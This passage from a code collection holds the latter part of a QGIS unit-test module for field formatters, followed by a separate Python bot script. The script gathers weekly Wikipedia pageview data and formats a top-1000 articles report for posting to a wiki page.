        self.assertFalse(QgsValueRelationFieldFormatter.expressionIsUsable("current_value ( 'TWO' )", QgsFeature()))

        layer = QgsVectorLayer("none?field=pkid:integer&field=decoded:string",
                               "layer", "memory")
        self.assertTrue(layer.isValid())
        QgsProject.instance().addMapLayer(layer)
        f = QgsFeature(layer.fields())
        f.setAttributes([1, 'value'])
        point = QgsGeometry.fromPointXY(QgsPointXY(123, 456))
        f.setGeometry(point)
        self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("current_geometry", f))
        self.assertFalse(QgsValueRelationFieldFormatter.expressionIsUsable("current_value ( 'TWO' )", f))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("current_value ( 'pkid' )", f))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionIsUsable("@current_geometry current_value ( 'pkid' )", f))

        QgsProject.instance().removeMapLayer(layer.id())

    def test_expressionRequiresParentFormScope(self):
        """Detection of current_parent_value()/parent-form variables."""
        res = list(QgsValueRelationFieldFormatter.expressionFormAttributes("current_value('ONE') AND current_parent_value('TWO')"))
        res = sorted(res)
        self.assertEqual(res, ['ONE'])

        res = list(QgsValueRelationFieldFormatter.expressionParentFormAttributes("current_value('ONE') AND current_parent_value('TWO')"))
        res = sorted(res)
        self.assertEqual(res, ['TWO'])

        res = list(QgsValueRelationFieldFormatter.expressionParentFormVariables("@current_parent_geometry"))
        self.assertEqual(res, ['current_parent_geometry'])

        self.assertFalse(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope(""))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope("current_parent_value('TWO')"))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope("current_parent_value ( 'TWO' )"))
        self.assertTrue(QgsValueRelationFieldFormatter.expressionRequiresParentFormScope("@current_parent_geometry"))
class TestQgsRelationReferenceFieldFormatter(unittest.TestCase):
    """Tests for QgsRelationReferenceFieldFormatter.representValue()."""

    def test_representValue(self):
        """Decode a foreign key through a project relation, including every
        broken setup (bad relation id, bad/missing display expression,
        wrong layer or field index, invalid relation)."""
        first_layer = QgsVectorLayer("none?field=foreign_key:integer",
                                     "first_layer", "memory")
        self.assertTrue(first_layer.isValid())
        second_layer = QgsVectorLayer("none?field=pkid:integer&field=decoded:string",
                                      "second_layer", "memory")
        self.assertTrue(second_layer.isValid())
        QgsProject.instance().addMapLayers([first_layer, second_layer])
        f = QgsFeature()
        f.setAttributes([123])
        first_layer.dataProvider().addFeatures([f])
        f = QgsFeature()
        f.setAttributes([123, 'decoded_val'])
        second_layer.dataProvider().addFeatures([f])
        relMgr = QgsProject.instance().relationManager()
        fieldFormatter = QgsRelationReferenceFieldFormatter()

        rel = QgsRelation()
        rel.setId('rel1')
        rel.setName('Relation Number One')
        rel.setReferencingLayer(first_layer.id())
        rel.setReferencedLayer(second_layer.id())
        rel.addFieldPair('foreign_key', 'pkid')
        self.assertTrue(rel.isValid())
        relMgr.addRelation(rel)

        # Everything valid
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), 'decoded_val')
        # Code not find match in foreign layer
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '456'), '456')
        # Invalid relation id
        config = {'Relation': 'invalid'}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
        # No display expression
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression(None)
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
        # Invalid display expression
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression('invalid +')
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
        # Missing relation
        config = {}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')
        # Inconsistent layer provided to representValue()
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(second_layer, 0, config, None, '123'), '123')
        # Inconsistent idx provided to representValue()
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(first_layer, 1, config, None, '123'), '123')
        # Invalid relation
        rel = QgsRelation()
        rel.setId('rel2')
        rel.setName('Relation Number Two')
        rel.setReferencingLayer(first_layer.id())
        rel.addFieldPair('foreign_key', 'pkid')
        self.assertFalse(rel.isValid())
        relMgr.addRelation(rel)
        config = {'Relation': rel.id()}
        second_layer.setDisplayExpression('decoded')
        self.assertEqual(fieldFormatter.representValue(first_layer, 0, config, None, '123'), '123')

        QgsProject.instance().removeAllMapLayers()
class TestQgsRangeFieldFormatter(unittest.TestCase):
    """Tests for QgsRangeFieldFormatter precision and locale handling."""

    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        QCoreApplication.setOrganizationName("QGIS_Test")
        QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsColorScheme.com")
        QCoreApplication.setApplicationName("QGIS_TestPyQgsColorScheme")
        QgsSettings().clear()
        QLocale.setDefault(QLocale(QLocale.English))
        start_app()

    @classmethod
    def tearDownClass(cls):
        """Reset locale"""
        QLocale.setDefault(QLocale(QLocale.English))

    def test_representValue(self):
        """Precision is honoured for doubles, ignored for integer types;
        group/decimal separators follow the active QLocale."""
        layer = QgsVectorLayer("point?field=int:integer&field=double:double&field=long:long",
                               "layer", "memory")
        self.assertTrue(layer.isValid())
        QgsProject.instance().addMapLayers([layer])
        fieldFormatter = QgsRangeFieldFormatter()

        # Precision is ignored for integers and longlongs
        self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '123'), '123')
        self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '123000'), '123,000')
        self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '9999999'), '9,999,999')  # no scientific notation for integers!
        self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, None), 'NULL')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123'), '123')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123000'), '123,000')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '9999999'), '9,999,999')  # no scientific notation for long longs!
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, None), 'NULL')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 1}, None, None), 'NULL')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 1}, None, '123'), '123.0')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, None), 'NULL')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123000'), '123,000.00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0'), '0.00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123'), '123.00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.123'), '0.12')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.127'), '0.13')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0'), '0.000')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0.127'), '0.127')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '1.27e-1'), '0.127')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-123'), '-123.00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.123'), '-0.12')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.127'), '-0.13')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-0.127'), '-0.127')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-1.27e-1'), '-0.127')

        # Check with Italian locale
        QLocale.setDefault(QLocale('it'))
        self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '9999999'),
                         '9.999.999')  # scientific notation for integers!
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123'), '123')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123000'), '123.000')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '9999999'), '9.999.999')  # scientific notation for long longs!
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, None), 'NULL')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, None), 'NULL')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123000'), '123.000,00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0'), '0,00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123'), '123,00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.123'), '0,12')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '0.127'), '0,13')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0'), '0,000')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '0.127'), '0,127')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '1.27e-1'), '0,127')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-123'), '-123,00')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.123'), '-0,12')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '-0.127'), '-0,13')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-0.127'), '-0,127')
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 3}, None, '-1.27e-1'), '-0,127')

        # Check with custom locale without thousand separator
        custom = QLocale('en')
        custom.setNumberOptions(QLocale.OmitGroupSeparator)
        QLocale.setDefault(custom)
        self.assertEqual(fieldFormatter.representValue(layer, 0, {'Precision': 1}, None, '9999999'),
                         '9999999')  # scientific notation for integers!
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123'), '123')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '123000'), '123000')
        self.assertEqual(fieldFormatter.representValue(layer, 2, {'Precision': 1}, None, '9999999'), '9999999')  # scientific notation for long longs!
        self.assertEqual(fieldFormatter.representValue(layer, 1, {'Precision': 2}, None, '123000'), '123000.00')

        QgsProject.instance().removeAllMapLayers()
class TestQgsCheckBoxFieldFormatter(unittest.TestCase):
    """Tests for QgsCheckBoxFieldFormatter.representValue()."""

    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        QCoreApplication.setOrganizationName("QGIS_Test")
        QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsCheckBoxFieldFormatter.com")
        QCoreApplication.setApplicationName("QGIS_TestPyQgsCheckBoxFieldFormatter")
        QgsSettings().clear()
        start_app()

    def test_representValue(self):
        """Checked/unchecked config states render 'true'/'false'; any other
        value falls back to the parenthesised raw value."""
        null_value = "NULL"
        QgsSettings().setValue("qgis/nullValue", null_value)
        layer = QgsVectorLayer("point?field=int:integer&field=str:string", "layer", "memory")
        self.assertTrue(layer.isValid())
        field_formatter = QgsCheckBoxFieldFormatter()

        # test with integer
        # normal case
        self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 0, 'CheckedState': 1}, None, 1), 'true')
        self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 0, 'CheckedState': 1}, None, 0), 'false')
        self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 0, 'CheckedState': 1}, None, 10), "(10)")
        # invert true/false
        self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 1, 'CheckedState': 0}, None, 0), 'true')
        self.assertEqual(field_formatter.representValue(layer, 0, {'UncheckedState': 1, 'CheckedState': 0}, None, 1), 'false')

        # test with string
        self.assertEqual(field_formatter.representValue(layer, 1, {'UncheckedState': 'nooh', 'CheckedState': 'yeah'}, None, 'yeah'), 'true')
        self.assertEqual(field_formatter.representValue(layer, 1, {'UncheckedState': 'nooh', 'CheckedState': 'yeah'}, None, 'nooh'), 'false')
        self.assertEqual(field_formatter.representValue(layer, 1, {'UncheckedState': 'nooh', 'CheckedState': 'yeah'}, None, 'oops'), "(oops)")
class TestQgsFallbackFieldFormatter(unittest.TestCase):
    """Tests for QgsFallbackFieldFormatter against memory, shapefile and
    GeoPackage providers (the latter reports no field precision)."""

    @classmethod
    def setUpClass(cls):
        """Run before all tests"""
        QCoreApplication.setOrganizationName("QGIS_Test")
        QCoreApplication.setOrganizationDomain("QGIS_TestPyQgsFieldFormatter.com")
        QCoreApplication.setApplicationName("QGIS_TestPyQgsFieldFormatter")
        QgsSettings().clear()
        QLocale.setDefault(QLocale(QLocale.English))
        start_app()

    @classmethod
    def tearDownClass(cls):
        """Reset locale"""
        QLocale.setDefault(QLocale(QLocale.English))

    def test_representValue(self):
        """Run the same formatting expectations against three providers."""
        def _test(layer, is_gpkg=False):
            # Skip fid and precision tests
            # (GeoPackage layers gain a leading 'fid' field, hence the offset,
            # and their double fields carry no precision.)
            offset = 1 if is_gpkg else 0
            fieldFormatter = QgsFallbackFieldFormatter()

            QLocale.setDefault(QLocale('en'))

            # Precision is ignored for integers and longlongs
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '123000'), '123,000')
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '9999999'), '9,999,999')
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, None), 'NULL')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123000'), '123,000')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '9999999'), '9,999,999')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, None), 'NULL')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, None), 'NULL')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123.00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, None), 'NULL')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123,000.00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123,000')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0'), '0')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0.127'), '0.127')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '1.27e-1'), '0.127')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123.00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-0.127'), '-0.127')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-1.27e-1'), '-0.127')

            # Check with Italian locale
            QLocale.setDefault(QLocale('it'))
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '9999999'),
                             '9.999.999')  # scientific notation for integers!
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123000'), '123.000')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '9999999'), '9.999.999')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, None), 'NULL')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, None), 'NULL')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123.000,00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123.000')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0'), '0')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123,00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '0.127'), '0,127')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '1.27e-1'), '0,127')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123,00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-123'), '-123')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-0.127'), '-0,127')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '-1.27e-1'), '-0,127')

            # Check with custom locale without thousand separator
            custom = QLocale('en')
            custom.setNumberOptions(QLocale.OmitGroupSeparator)
            QLocale.setDefault(custom)
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, '9999999'),
                             '9999999')  # scientific notation for integers!
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, '9999999'), '9999999')
            if not is_gpkg:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123000.00000')
            else:
                self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, '123000'), '123000')

            # Check string
            self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, '123'), '123')
            self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, 'a string'), 'a string')
            self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, ''), '')
            self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, None), 'NULL')

            # Check NULLs (this is what happens in real life inside QGIS)
            self.assertEqual(fieldFormatter.representValue(layer, 0 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
            self.assertEqual(fieldFormatter.representValue(layer, 1 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
            self.assertEqual(fieldFormatter.representValue(layer, 2 + offset, {}, None, QVariant(QVariant.String)), 'NULL')
            self.assertEqual(fieldFormatter.representValue(layer, 3 + offset, {}, None, QVariant(QVariant.String)), 'NULL')

        memory_layer = QgsVectorLayer("point?field=int:integer&field=double:double&field=long:long&field=string:string",
                                      "layer", "memory")
        self.assertTrue(memory_layer.isValid())
        _test(memory_layer)

        # Test a shapefile
        shape_path = writeShape(memory_layer, 'test_qgsfieldformatters.shp')
        shapefile_layer = QgsVectorLayer(shape_path, 'test', 'ogr')
        self.assertTrue(shapefile_layer.isValid())
        _test(shapefile_layer)

        gpkg_path = tempfile.mktemp('.gpkg')

        # Test a geopackage
        _, _ = QgsVectorFileWriter.writeAsVectorFormat(
            memory_layer,
            gpkg_path,
            'utf-8',
            memory_layer.crs(),
            'GPKG',
            False,
            [],
            [],
            False
        )
        gpkg_layer = QgsVectorLayer(gpkg_path, 'test', 'ogr')
        self.assertTrue(gpkg_layer.isValid())
        # No precision here
        _test(gpkg_layer, True)
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| gpl-2.0 |
jtmorgan/hostbot | top_1000_report.py | 1 | 10578 | #! /usr/bin/env python
from datetime import datetime, timedelta
import hb_config
import json
import pandas as pd
import requests
from requests_oauthlib import OAuth1
from urllib import parse
# Wikitext emitted above the report table: section heading with the date
# window ({date7} oldest, {date1} newest), a signature timestamp, and the
# sortable-table header. Doubled braces survive str.format().
rt_header = """== Popular articles {date7} to {date1} ==
Last updated on ~~~~~
{{| class="wikitable sortable"
!Rank
!Article
!Total weekly views
!Days in top 1k this week
"""

# Wikitext that closes the table; the HTML comment warns page editors.
footer = """|}
<!--IMPORTANT add all categories to the top section of the page, not here. Otherwise, they will get removed when the bot runs tomorrow! -->
"""

# Wikitext template for one table row, filled per article via str.format().
rt_row = """|-
|{rank}
|[[w:{title}|{title}]]
|{week_total}
|{days_in_topk}
"""
def get_yesterdates(lookback=7):
    """Return date metadata for the previous ``lookback`` days.

    Accepts a lookback parameter of how many days ago to gather data for
    (not including the current day); must be at least 1, defaults to 7.
    Returns a list of dicts in reverse chronological order, each with:
      'year', 'month', 'day'  -- zero-padded strings,
      'display_date'          -- "YYYY-MM-DD",
      'api_date'              -- "YYYYMMDD00", the hourly timestamp format
                                 expected by the Wikimedia pageview API.

    NOTE(review): the original docstring mentions UTC but ``datetime.now()``
    is local time -- confirm which is intended before changing it.
    """
    # Capture "now" once so every entry is derived from the same instant.
    # The original re-read the clock for each strftime call, which could mix
    # two different days if the loop ran across midnight.
    now = datetime.now()
    date_range = []
    for d in range(1, lookback + 1):
        day = now - timedelta(days=d)
        date_parts = {
            'year': day.strftime('%Y'),
            'month': day.strftime('%m'),
            'day': day.strftime('%d'),
        }
        date_parts['display_date'] = "{year}-{month}-{day}".format(**date_parts)
        date_parts['api_date'] = "{year}{month}{day}00".format(**date_parts)
        date_range.append(date_parts)
    return date_range
def get_all_topk_articles(day_range):
    """
    Accepts a list of dicts with year, month, and day values.
    Returns a dictionary keyed by article title that covers every article
    appearing in the daily top-1000 list on any of the given dates, mapping
    each title to a dict of api_date -> pageview count for the days it
    charted.

    Example query:
    https://wikimedia.org/api/rest_v1/metrics/pageviews/top/en.wikipedia.org/all-access/2020/03/31
    """
    endpoint = "https://wikimedia.org/api/rest_v1/metrics/pageviews/top/en.wikipedia.org/all-access/{year}/{month}/{day}"
    headers = {'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"}
    articles = {}
    for day_val in day_range:
        response = requests.get(
            url=endpoint.format(**day_val),
            headers=headers,
        ).json()
        for entry in response['items'][0]['articles']:
            # Record one view count per charting day, keyed by api_date.
            articles.setdefault(entry['article'], {})[day_val['api_date']] = entry['views']
    return articles
def ar_days_in_topk(day_range, ar_dict):
    """
    Accepts a day-range list (unused here; kept for interface parity with the
    other report helpers) and a nested dict keyed by article title whose
    values map dates to view counts.
    Mutates each per-article dict in place, adding a 'topk_days' entry equal
    to the number of date entries it already held, and returns ar_dict.
    """
    for per_day_views in ar_dict.values():
        days_charted = len(per_day_views)
        per_day_views['topk_days'] = days_charted
    return ar_dict
def get_daily_non_topk_counts(day_range, ar_dict):
    """
    Backfill pageview counts for days an article was NOT in the topk list.

    Accepts a list of dicts with year, month, day and api_date values, and a
    dict keyed by article title whose values map api_date -> views (plus the
    'topk_days' counter added by ar_days_in_topk).
    For every article that missed the topk list on at least one day, queries
    the per-article pageviews API over the whole range and fills in the
    missing dates, leaving already-known counts untouched.
    Returns the (mutated) article dict.
    Example query: https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia.org/all-access/user/2009_swine_flu_pandemic/daily/2020032500/2020033100
    """
    q_template = "https://wikimedia.org/api/rest_v1/metrics/pageviews/per-article/en.wikipedia.org/all-access/user/{article}/daily/{day7}/{day1}"
    # A fully-covered article holds one key per day plus 'topk_days'
    # (generalizes the previous hard-coded threshold of 8 for a 7-day range).
    full_size = len(day_range) + 1
    for title, views_by_day in ar_dict.items():
        if len(views_by_day) < full_size:  # article missed the topk on some days
            safe_title = parse.quote(title, safe='')  # titles may hold URL-unsafe chars
            # day_range is ordered newest-first: [-1] is the oldest day, [0] the newest
            q_string = q_template.format(article = safe_title,
                                         day7 = day_range[-1]['api_date'],
                                         day1 = day_range[0]['api_date'])
            r = requests.get(
                url = q_string,
                headers = {'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"},
            )
            response = r.json()
            for daily in response['items']:
                # only fill gaps; keep the counts we already have from the topk query
                views_by_day.setdefault(daily['timestamp'], daily['views'])
    return ar_dict
def fill_null_date_vals(day_range, ar_dict):
    """
    Pad each article's sub-dict so every date in range has a pageview value.

    Accepts a list of dicts with year, month, day and api_date values, and a
    dict keyed by article title whose values may still be missing some dates.
    Returns the article dict with every sub-dict fully populated: any date
    with no recorded pageviews gets a value of 0.
    """
    # One key per day plus 'topk_days' (was a hard-coded 8 for a 7-day range).
    full_size = len(day_range) + 1
    # BUG FIX: this previously iterated the global week_of_days instead of
    # the day_range parameter, silently coupling the function to __main__.
    for day_val in day_range:
        for views_by_day in ar_dict.values():
            if len(views_by_day) < full_size:  # still missing pageviews for some days
                # adds a key with val of 0 only if no key is present
                views_by_day.setdefault(day_val['api_date'], 0)
    return ar_dict
def format_row(rank, title, week_total, days_in_topk, row_template):
    """Render a single report-table row by filling row_template with the
    article's rank, display title, weekly total, and days-in-topk count."""
    return row_template.format(
        rank=rank,
        title=title.replace("_", " "),  # display titles use spaces, not underscores
        week_total=week_total,
        days_in_topk=days_in_topk,
    )
def get_token(auth1):
    """
    Fetch a CSRF edit token from the English Wikipedia API.

    Accepts an OAuth1 auth object for the bot account.
    Returns the edit token string needed to publish edits.
    """
    token_params = {
        'action': "query",
        'meta': "tokens",
        'type': "csrf",
        'format': "json"
    }
    result = requests.get(
        url="https://en.wikipedia.org/w/api.php",  # TODO add to config
        params=token_params,
        headers={'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"},  # TODO add to config
        auth=auth1,
    ).json()
    return result['query']['tokens']['csrftoken']
def publish_report(output, edit_sum, auth1, edit_token):
    """
    Publish the formatted report text to the wiki.

    Accepts the page text, an edit summary, the OAuth1 credentials, and a
    CSRF edit token; posts the text to the report page on English Wikipedia.
    """
    edit_payload = {
        'action': "edit",
        'title': "User:HostBot/Top_1000_report",  # TODO add to config
        'section': "1",
        'summary': edit_sum,  # TODO add to config
        'text': output,
        'bot': 1,
        'token': edit_token,
        'format': "json"
    }
    requests.post(
        url="https://en.wikipedia.org/w/api.php",  # TODO add to config
        data=edit_payload,
        headers={'User-Agent': "hostbot (https://wikitech.wikimedia.org/wiki/Tool:HostBot, jonnymorgan.esq@gmail.com)"},  # TODO add to config
        auth=auth1
    )
if __name__ == "__main__":
    # Build and publish the weekly "Top 1000" popular-articles report.
    # OAuth1 credentials for the bot account; the secrets live in hb_config.
    # NOTE(review): the consumer key and resource-owner key are hard-coded
    # here -- consider moving them into hb_config alongside the secrets.
    auth1 = OAuth1("b5d87cbe96174f9435689a666110159c",
                   hb_config.client_secret,
                   "ca1b222d687be9ac33cfb49676f5bfd2",
                   hb_config.resource_owner_secret)
    #get previous week's date info for query and reporting
    week_of_days = get_yesterdates(lookback=7)
    #get all of the articles that appeared on the topk list that week
    all_articles = get_all_topk_articles(week_of_days)
    #get counts for all days each article was in the top 1000
    # all_articles = get_daily_topk_counts(week_of_days, all_articles)
    #add number of days each article appears in the topk list. could do this in first function too
    # NOTE(review): ar_days_in_topk ignores its first argument, so passing
    # len(week_of_days) rather than week_of_days is harmless but confusing.
    all_articles = ar_days_in_topk(len(week_of_days), all_articles)
    #add page counts for days the article was not in the topk list
    all_articles = get_daily_non_topk_counts(week_of_days, all_articles)
    #pad any remaining gaps with zero pageview counts
    all_articles = fill_null_date_vals(week_of_days, all_articles)
    #now we're ready to make a dataframe!
    df_aa = pd.DataFrame.from_dict(all_articles, orient="index")
    #sum across the daily counts
    #https://stackoverflow.com/questions/25748683/pandas-sum-dataframe-rows-for-given-columns
    # NOTE(review): this row sum includes the 'topk_days' column, so
    # week_total = total views + days-in-topk. Confirm this is intended;
    # if not, sum only the date columns.
    df_aa['week_total'] = df_aa.sum(axis=1)
    #make the title NOT the index. Should do this when creating the frame, instead
    df_aa.reset_index(inplace=True)
    #rename title column. Should do this when creating the frame, instead
    df_aa.rename(columns = {'index' : 'title'}, inplace=True)
    #remove blacklisted titles--pages we don't care about, for these purposes. Although... we could keep them I guess.
    blacklist = ["Main_Page", "Special:", "Category:", "Portal:", "Template:", "Wikipedia:", "Talk:", "User:", "_talk:", "Help:", "File:", "United_States_Senate",]
    # str.contains treats the joined blacklist as a regex alternation;
    # entries contain no regex metacharacters, so no escaping is needed here.
    df_aa = df_aa[~df_aa['title'].str.contains('|'.join(blacklist))]
    #sort by weekly views
    df_aa.sort_values('week_total', ascending=False, inplace=True)
    #add rank column based on weekly views
    new_rank = range(1, len(df_aa)+1)
    df_aa['rank'] = list(new_rank)
    #reset the index to reflect the final ranking, dropping the existing index this time
    df_aa.reset_index(drop=True, inplace=True)
    #start and end dates for header and edit comment
    # week_of_days is newest-first: date1 = yesterday, date7 = a week ago
    header_dates = {'date1' : week_of_days[0]['display_date'],
                    'date7' : week_of_days[6]['display_date']
                   }
    #format the header template
    header = rt_header.format(**header_dates)
    #render one wikitable row per ranked article
    report_rows = [format_row(a, b, c, d, rt_row) #this is messy
                   for a, b, c, d
                   in zip(df_aa['rank'],
                          df_aa['title'],
                          df_aa['week_total'],
                          df_aa['topk_days'],
                          )]
    rows_wiki = ''.join(report_rows)
